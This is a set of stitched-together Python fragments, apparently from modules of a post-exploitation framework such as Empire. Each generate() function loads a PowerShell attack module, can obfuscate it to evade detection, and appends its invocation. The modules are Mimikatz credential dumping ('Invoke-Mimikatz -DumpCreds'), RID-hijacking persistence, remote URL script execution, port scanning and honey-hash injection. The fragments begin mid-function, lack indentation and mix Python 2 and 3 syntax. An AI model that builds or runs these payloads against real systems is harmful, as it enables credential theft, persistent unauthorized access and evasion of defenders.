cur.execute("SELECT Invoke_Mimikatz FROM functions")
replacement = cur.fetchone()
cur.close()
self.lock.release()
script = script.replace("Invoke-Mimikatz", replacement[0])
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.installPath + "/data/module_source/persistence/Invoke-RIDHijacking.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-RIDHijacking"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd,
installPath=self.mainMenu.installPath,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
# if you're reading in a large, external script that might be updates,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Execute-Url-Script.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "\nExecute-Url-Script"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " +
str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Invoke-PortScan -noProgressMeter -f"
for option, values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}"
if obfuscate:
scriptEnd = helpers.obfuscate(
psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/New-HoneyHash.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "New-HoneyHash"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource,
obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source",
"obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print(
helpers.color("[!] Could not read module source path at: " +
str(moduleSource)))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
# build the dump command with whatever options we want
scriptEnd = "Invoke-Mimikatz -DumpCreds;"
for option, values in self.options.items():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
scriptEnd += " -" + str(option) + " " + str(
values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(
self.mainMenu.installPath,
psScript=scriptEnd,
obfuscationCommand=obfuscationCommand)
script += scriptEnd
script = helpers.keyword_obfuscation(script)
return script
